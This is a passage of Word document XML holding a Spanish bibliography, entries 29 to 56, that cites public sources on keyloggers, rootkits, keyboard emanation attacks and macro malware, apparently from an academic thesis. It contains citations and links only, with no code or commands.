                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[29] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">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DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[30] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">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DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[31] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">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DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[32] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Ministerio de Gracia y Justicia. BOE, «Ley de Enjuiciamiento Criminal.,» [En línea]. Available: https://www.boe.es/buscar/pdf/1882/BOE-A-1882-6036-consolidado.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[33] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>KeeLog, «Keylogger por Hardware Open Source DIY,» [En línea]. Available: https://www.keelog.com/es/diy-hardware-keylogger/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[34] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>KeeLog, «Keylogger Inalámbrico - ¡Hazlo tú mismo!,» [En línea]. Available: http://www.keelog.com/es/wireless-keylogger/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[35] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>J. Rutkowska, «Introducing Blue Pill,» 22 Junio 2006. [En línea]. Available: https://blog.invisiblethings.org/2006/06/22/introducing-blue-pill.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[36] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>K. Beaver, «The Blue Pill virtualization attack: Virtual machine malware,» 30 Octubre 2006. [En línea]. Available: https://searchservervirtualization.techtarget.com/tip/The-Blue-Pill-virtualization-attack-Virtual-machine-malware.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[37] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>J. Rutkowska, «Subverting Vista Kernel for Fun and Profit,» 3 Agosto 2006. [En línea]. Available: https://blackhat.com/presentations/bh-usa-06/BH-US-06-Rutkowska.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[38] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft Windows Dev Center, «Documentación SetWindowsHookEx,» 12 Mayo 2018. [En línea]. Available: https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[39] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft Windows Dev Center, «Documentación UnhookWindowsHookEx,» 12 Mayo 2018. [En línea]. Available: https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-unhookwindowshookex.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[40] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Adlice Software, «KernelMode Rootkits: Part 3, kernel filters,» 10 Julio 2014. [En línea]. Available: https://www.adlice.com/kernelmode-rootkits-part-3-kernel-filters/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[41] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>atorralb, «javascript keylogger,» [En línea]. Available: https://gist.github.com/atorralb/fbc82f70e1e2c1ebc67f.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[42] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>CyberPoint, «Logging Keystrokes with Event Tracing for Windows (ETW),» 22 Octubre 2016. [En línea]. Available: https://www.cyberpointllc.com/srt/posts/srt-logging-keystrokes-with-event-tracing-for-windows-etw.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[43] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>M. Chehab, «CSS Keylogger,» 21 Febrero 2018. [En línea]. Available: https://github.com/maxchehab/CSS-Keylogging.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[44] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>T. Gersic, «tomgersic/AndroidKeyLogger,» 1 Agosto 2012. [En línea]. Available: https://github.com/tomgersic/AndroidKeyLogger.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[45] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Dmitri Asonov, Rakesh Agrawal, IBM Almaden Research Center, «Keyboard Acoustic Emanations,» 2004. [En línea]. Available: https://www.davidsalomon.name/CompSec/auxiliary/KybdEmanation.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[46] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">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47] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Martin Vuagnoux, Sylvain Pasini. LASEC/EPFL, «Compromising Electromagnetic Emanations of Wired and Wireless Keyboards,» Agosto 2009. [En línea]. Available: https://www.usenix.org/legacy/events/sec09/tech/full_papers/vuagnoux.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[48] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>S. Kamkar, «KeySweeper, a stealthy Arduino-based device,» 12 Enero 2015. [En línea]. Available: https://samy.pl/keysweeper/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[49] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Nora Codes, «PDF Embedding Attacks,» 04 Agosto 2018. [En línea]. Available: https://nora.codes/post/pdf-embedding-attacks/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[50] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>M. Nelson, «The Tale of SettingContent-ms Files,» 11 Junio 2018. [En línea]. Available: https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[51] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft. Centro para desarrolladores de Office., «Introducción a VBA en Office,» 14 Agosto 2019. [En línea]. Available: https://docs.microsoft.com/es-es/office/vba/library-reference/concepts/getting-started-with-vba-in-office.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[52] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft, «Descripción de los comportamientos de macros AutoExec y AutoOpen en Word,» [En línea]. Available: https://support.microsoft.com/es-es/help/286310/description-of-behaviors-of-autoexec-and-autoopen-macros-in-word.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[53] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft, «Macro malware,» 10 Agosto 2019. [En línea]. Available: https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/macro-malware.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[54] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>F. Viggiani, «Embedding EXE files into PowerShell scripts,» 15 03 2016. [En línea]. Available: https://truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[55] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>KeeLog, «AirDrive Forensic Keylogger Module,» [En línea]. Available: http://www.keelog.com/airdrive-forensic-keylogger-module-usb-hardware-keylogger-module-with-wifi-and-flash/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[56] </w:t>
                    </w:r>
                  </w:p>
